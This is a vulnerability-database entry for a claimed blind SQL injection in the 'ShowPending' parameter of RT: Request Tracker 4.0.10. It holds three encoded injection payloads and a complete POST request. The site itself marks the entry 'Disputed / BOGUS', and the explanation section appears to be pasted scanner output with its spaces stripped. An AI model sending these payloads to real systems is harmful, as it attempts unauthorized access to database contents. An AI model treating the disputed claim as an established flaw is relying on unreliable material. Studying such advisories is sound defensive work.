Disputed / BOGUS

RT: Request Tracker 4.0.10 SQL Injection

Published / (Updated)
Credit
Risk
2013-04-11 / 2013-12-23
cheki
Medium
CWE
CVE
Local
Remote
CWE-89
CVE-2013-3525
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

# Exploit Title: - SQL-Injection - RT: Request Tracker System
# Date: 10/05/2013
# Exploit Author: cheki
# Vendor Homepage: http://bestpractical.com/rt/
# Version: RT 4.0.10
# Tested on: Kali Linux

############################################
URL: http://10.10.10.70/Approvals/
Entity: ShowPending(Parameter)
Risk: Itispossibletoview,modifyordeletedatabaseentriesandtables
Causes: Sanitationofhazardouscharacterswasnotperformedcorrectlyonuserinput
Fix: Reviewpossiblesolutionsforhazardouscharacterinjection

#Description: Blind SQL Injection: append Boolean True/False string expressions, using apostrophes
and commenting out the rest of the query.
#The following changes were applied the original request
1) Set parameter 'ShowPending's value to '1%27+and+%27f%27%3D%27f%27%29+--+'
2) Set parameter 'ShowPending's value to '1%27+and+%27b%27%3D%27f%27%29+--'
3) Set parameter 'ShowPending's value to '1%27+or+%27b%27%3D%27f%27%29+--'


POST /Approvals/ HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Cookie: RT_SID_example.com.80=7c120854a0726239b379557f024cc1cb
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://10.10.10.70/Approvals/
Host: 10.10.10.70
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Length: 120

ShowPending=1%27+and+%27f%27%3D%27f%27%29+--+&ShowResolved=1&ShowRejected=1&ShowDependent=1&CreatedBefore=&CreatedAfter=

###############################################
Reasoning: Thetestresultseemstoindicateavulnerabilitybecauseitshowsthatvalues
canbeappendedtoparametervalues, indicatingthattheywereembeddedinanSQLquery.HEX(0D)HEX(0A)In
thistest,three(orsometimesfour)requestsare sent.Thelastislogicallyequaltotheoriginal,andthe
nexttolastisdifferent.Anyothersareforcontrolpurposes.A comparisonofthelasttworesponseswith
thefirst(thelastissimilartoit,andthenexttolastisdifferent)indicatesthat theapplicationisvulnerable.


Home Page: securitylabnews.blogspot.com

References:

http://bestpractical.com/rt/


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2015, cxsecurity.com